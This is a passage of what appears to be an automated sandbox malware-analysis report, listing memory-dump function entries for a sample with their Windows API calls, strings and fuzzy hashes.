                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                  • String ID: EDIT
                                  • API String ID: 4243998846-3080729518
                                  • Opcode ID: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                  • Instruction ID: 2c62d141ffa786ad3e2e3168f4367ba235127cdd3a98abad73aa826cd9bf48c6
                                  • Opcode Fuzzy Hash: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                  • Instruction Fuzzy Hash: 4801FF61B18A4683FA20AF21F8247AEE391AF98F64FC45035CD4D87755EF2CF148C6A0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite$Handle
                                  • String ID:
                                  • API String ID: 4209713984-0
                                  • Opcode ID: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                  • Instruction ID: 347d5e6e37ee9fce699eb7fd2206744b543728cb2f8b794006dad46d0fc8b42e
                                  • Opcode Fuzzy Hash: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                  • Instruction Fuzzy Hash: 6751D462A1964283EA10AF15F44477EE360BB44FB4F810235EA5D86B90DF6CF684C791
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                  • String ID:
                                  • API String ID: 3750147219-0
                                  • Opcode ID: 50b89a8270df903bc8d53bcbbcc158286c6a4e06f2f404c7bb081b93efef60e5
                                  • Instruction ID: 6e43a0ac1747f862967e5d9d19b0719b2ad054fdbdd7be9b6a5fd6b04da09bd1
                                  • Opcode Fuzzy Hash: 50b89a8270df903bc8d53bcbbcc158286c6a4e06f2f404c7bb081b93efef60e5
                                  • Instruction Fuzzy Hash: 14518062B1879186FA00AFA4E4453ACE362AB44FB4FD00635EA1C977D6DF6CF55083A0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 2359106489-0
                                  • Opcode ID: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                  • Instruction ID: aeebf426e120d9567595e9391a093ae1dc5286d25d9934a36e7152e1820d6224
                                  • Opcode Fuzzy Hash: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                  • Instruction Fuzzy Hash: 87318422A1C74283EB20AF65B44417DE251FB88FB4F954331EE5D82795DF2CF6418791
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 1452418845-0
                                  • Opcode ID: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                  • Instruction ID: b3cea9cb0245ec9b44ddf5e004ab3af51b17febd21bfd39a6811edb3edc58bd6
                                  • Opcode Fuzzy Hash: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                  • Instruction Fuzzy Hash: E5312921E0820387FA25BF65B4552BDE2859F41BA4FC44434EA4ECB3D7DF2CB92586B1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$FileHandleRead
                                  • String ID:
                                  • API String ID: 2244327787-0
                                  • Opcode ID: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                  • Instruction ID: 4cad5f85c07ae26f52294e92e842ba947aa001b851cf5e88230a9314de75e5c4
                                  • Opcode Fuzzy Hash: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                  • Instruction Fuzzy Hash: 08215621A0C64183EA60BF12B44023EE7A0EF45FB4F954731EA5D86784DF6CFA5587A2
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DirectoryInitializeMallocSystem
                                  • String ID: riched20.dll
                                  • API String ID: 174490985-3360196438
                                  • Opcode ID: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
                                  • Instruction ID: 661b78868cfe610236ad058f315db3330e3efa4a156d4af09a4434765909527a
                                  • Opcode Fuzzy Hash: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
                                  • Instruction Fuzzy Hash: F8F0F471618B4583DB50EF60F4581AEF3A0FB84B64F844135E99D82B55DF7CE158CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                  • String ID:
                                  • API String ID: 2032784890-0
                                  • Opcode ID: 7795e1decf5c61fb28cbe9873a1872282343af9adeb0f6444034ac41d94e344c
                                  • Instruction ID: 1af6b2ecef1a55443135b52246cee31ed9d0a4d0c58017cf233fd78704b98739
                                  • Opcode Fuzzy Hash: 7795e1decf5c61fb28cbe9873a1872282343af9adeb0f6444034ac41d94e344c
                                  • Instruction Fuzzy Hash: FA61C372B14B41CAEB00EF60E4542ECB3A1EB45BA8F814635DA1D93B99DF38F155C390
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 2272807158-0
                                  • Opcode ID: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
                                  • Instruction ID: f140d1f0581db72cb36ac0de4f87b2f6882186b2466eedd8c396595690a58a1b
                                  • Opcode Fuzzy Hash: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
                                  • Instruction Fuzzy Hash: 51419B62A1878583EB10AF16F44426DE3A1FB84BB4F900335DEAD42BD5CF3CE5A08791
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 2176759853-0
                                  • Opcode ID: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
                                  • Instruction ID: 7cc6784e31b0435712108cadd03048dba4bf1ce33bd7223bc013447ff0180fe7
                                  • Opcode Fuzzy Hash: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
                                  • Instruction Fuzzy Hash: A4218162629B8582EA109F65B44016EE364FB89FE0F945335EF9C43B95DF3CE190C780
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 1203560049-0
                                  • Opcode ID: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                  • Instruction ID: 78c7c669ef114f03b8078147b6eef63ed73e676dc22490eb92b9fcdba8ebddfb
                                  • Opcode Fuzzy Hash: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                  • Instruction Fuzzy Hash: 8A21D822A1C78182EA20AF14F44426EE361FF88FB4F945330FE9D82795DF2CE6408795
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 3118131910-0
                                  • Opcode ID: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
                                  • Instruction ID: 18ded456ff567cb04ec5f2f1a054105b1d6a5d4b1e04bcba09de512b7ca769df
                                  • Opcode Fuzzy Hash: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
                                  • Instruction Fuzzy Hash: 9521A962A1878183EB10AF25F44412EE360FB85FE4F901335FA9D86B99DF2CE6418790
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 1203560049-0
                                  • Opcode ID: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
                                  • Instruction ID: 770379446bc2bedbd5e9b96b5ad06b9b67995eeae8aa55e4caf336f6fdd6450a
                                  • Opcode Fuzzy Hash: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
                                  • Instruction Fuzzy Hash: CA214972A1878583EA10AF19F48412DE361FB88FB8F900331EA9D87B95DF7CE6418751
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                  • Instruction ID: 77d03abaf31135e1b2dcae9c6de33f3d3b9edf2f04a63236316addb36da90a96
                                  • Opcode Fuzzy Hash: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                  • Instruction Fuzzy Hash: A6E0E560B0460683EA047FA5B891A7EE262AF88B61F404438CC4A82396CF7DB45886B0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn
                                  • String ID: vector too long
                                  • API String ID: 3668304517-2873823879
                                  • Opcode ID: a7343eee3c490a039372984b75849d01cabdd3500f915569194afc0abc0bdd4f
                                  • Instruction ID: fc697e7ff6c24500d22f1a9eb7e6850214ba6ea72a69e2a15ff813066e0c6214
                                  • Opcode Fuzzy Hash: a7343eee3c490a039372984b75849d01cabdd3500f915569194afc0abc0bdd4f
                                  • Instruction Fuzzy Hash: F4619072A1878187E700AF60E8401ADF7F1FB85B64F945235EA9987B95DF38E490C790
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 3668304517-0
                                  • Opcode ID: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
                                  • Instruction ID: 6d3c8a622e403ffb0675651c22151f9b20c2b788aa564124768b4d173525b0bc
                                  • Opcode Fuzzy Hash: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
                                  • Instruction Fuzzy Hash: 72717D62B18A5187FA00EF64F4541ACE3AAAB44FB4B900231DA2D877D9DF38F451C3A0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                  • Instruction ID: da6cb66099bfaffce0befa13cd36b8ea3174e177ca0a82d250807da1daa6e79f
                                  • Opcode Fuzzy Hash: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                  • Instruction Fuzzy Hash: C331B222A1969583EE706E1AE54067DE350AF08FF8F950231DE1D87B94DF2CF64187A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                  • String ID:
                                  • API String ID: 3587649625-0
                                  • Opcode ID: 78dcec84b2b2081ffdb456cee5bc94528ec2c7f435e71baf867d0267fc902a63
                                  • Instruction ID: 9667cdc0b11935f738163c7628ac33389742391c05752258e83ba38fcfd4c650
                                  • Opcode Fuzzy Hash: 78dcec84b2b2081ffdb456cee5bc94528ec2c7f435e71baf867d0267fc902a63
                                  • Instruction Fuzzy Hash: 3B41B462F14B858BFB00AF69F4412ACF362EB44BB8F805235DE5C52BD9DF78A1508394
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 1746051919-0
                                  • Opcode ID: a9e66eae6c10b7998c2c5de9bd97b12879dcbec8aef09866538b836a72d0f55b
                                  • Instruction ID: 12a8882598ac2226b828e08c951099f2fb57f00e3f0ba403a485896a1682843c
                                  • Opcode Fuzzy Hash: a9e66eae6c10b7998c2c5de9bd97b12879dcbec8aef09866538b836a72d0f55b
                                  • Instruction Fuzzy Hash: E1319C62A1874182EA20AF15F4443ADF3A5AB84FB0F844235EB9C46B95DF7CF6548790
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$BuffersFlushTime
                                  • String ID:
                                  • API String ID: 1392018926-0
                                  • Opcode ID: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                  • Instruction ID: 965450b4849cceeb02daa1fb780a8661e2411c0427a58460b0c7cf60242c406f
                                  • Opcode Fuzzy Hash: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                  • Instruction Fuzzy Hash: 6D21F662A0A64253EA61AF12F00137EE7D4AF01FA4F864230DE4C46391EF3CF646C392
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
